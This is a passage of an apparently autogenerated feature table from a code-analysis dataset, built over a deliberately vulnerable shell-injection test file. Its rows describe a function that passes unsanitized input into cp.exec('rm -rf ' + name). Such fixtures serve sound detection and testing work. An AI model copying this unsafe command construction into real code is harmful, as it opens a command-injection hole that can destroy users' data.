name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | functio ... ENCY]\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | functio ... ENCY]\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | return of anonymous function | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:29:225:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:216:39:216:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:3 | cp | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:3 | cp | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:8 | cp.exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:5:217:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:5:217:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:5:217:8 | exec | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:5:217:8 | exec | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:5:217:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:10:217:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:22:217:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:6:219:37 | !/^([a- ... t(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:6:219:37 | !/^([a- ... t(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:6:219:37 | !/^([a- ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:6:219:37 | !/^([a- ... t(name) | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:6:219:37 | !/^([a- ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:26 | /^([a-zA-Z0-9]+))?$/ | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:26 | /^([a-zA-Z0-9]+))?$/ | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:26 | /^([a-zA-Z0-9]+))?$/ | enclosingFunctionBody | name cp exec rm -rf name /^([a-zA-Z0-9]+))?$/ test name cp exec rm -rf name process exit 1 cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:26 | /^([a-zA-Z0-9]+))?$/ | enclosingFunctionName | blackList2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:26 | /^([a-zA-Z0-9]+))?$/ | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:31 | /^([a-z ... $/.test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 